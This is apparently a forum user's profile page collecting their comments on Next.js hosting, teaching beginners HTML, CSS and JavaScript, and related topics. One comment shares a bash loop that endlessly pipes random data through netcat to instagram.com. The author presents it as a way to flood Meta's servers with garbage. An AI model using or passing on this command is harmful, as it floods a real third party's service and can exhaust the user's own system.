Skip Navigation

Posts
9
Comments
77
Joined
8 mo. ago

☭🇨🇳🇷🇺

  • Wtf!

  • no the site isn't statically generated. I want Vercel Functions too I think because I am also utilizing SSR and nextjs api ( so basically it's not a static site ), the CI/CD part has been taken care of by Github actions. the site is currently in beta testing so there is few hundred of testing users are there using the site.

  • Thank you for sharing this I only knew about Disroot :o

  • for those of you who want an alternative check out Delta Chat :D

  • Finding jobs/employees as it has completely taken over glassdoor and indeed in the EU it seems.

    wow, I didn't know about glassdoor, thank you!

  • afaik they also released a vibe coded nextjs alternatvie too!

  • Yes, python is very easy language for begginers and they might need it to create backend however most students don't even know the difference between frontend and backend. They just want to create few simple website. And even if I teach them python first to write APIs, I eventually have to teach them about html, css and js

  • Ah, thanks for reminding me about git. I almost forgot that it's also a thing which new comers struggle with.

  • The main reason to not including python is that students aren't particularly in the CS field, they are learning it as their "augmented skill" (I don't know what it's called bad English). That's why I don't want to force them to learn CS concept which they might not even need.

    I was thinking about C so that their fundamentals gets cleared but I think it will be too much for students who aren't into CS. What do you think ?

  • That makes sense, I am also teaching html amd css first so I think JavaScript makes sense to teach next.

    I was thinking about C because that's the first thing I learned in the college and that's my favorite language till this day.

  • could you share some resources please?

  • we have been trying to move away from google but don't have any other robust solution to prevent spam that's why we are stuck with Google :(

  • welcome!

    I am currently working on https://spaidyslabs.com/ it's a project of my friend. feel free to join or collaborate! :D

    ( oh and if you find any vulnerabilities which there are a lot please report it don't exploit it :) )

  • Thank you for the help <3

  • no 🤧

    I mean yeah I used AI but it's not entirely vibe coded.

  • there used to be a time when you can just use curl to upload files to 0x0.st but recently they don't allow it I think because of the spam.

  • I found this magical command to send 50kb of random text data to meta's server to fill up their database with garbage data. I don't know how to do it on massive scale but at least I am doing my part by running this command 24/7 :)

     bash
        
    while true;  do echo "$(openssl rand -hex 500000)" | netcat instagram.com 80 & disown; done;
    
      
  • wait what? I feel like I am left behind in the tech. I only know about ipv4 and ipv6 😭😭😭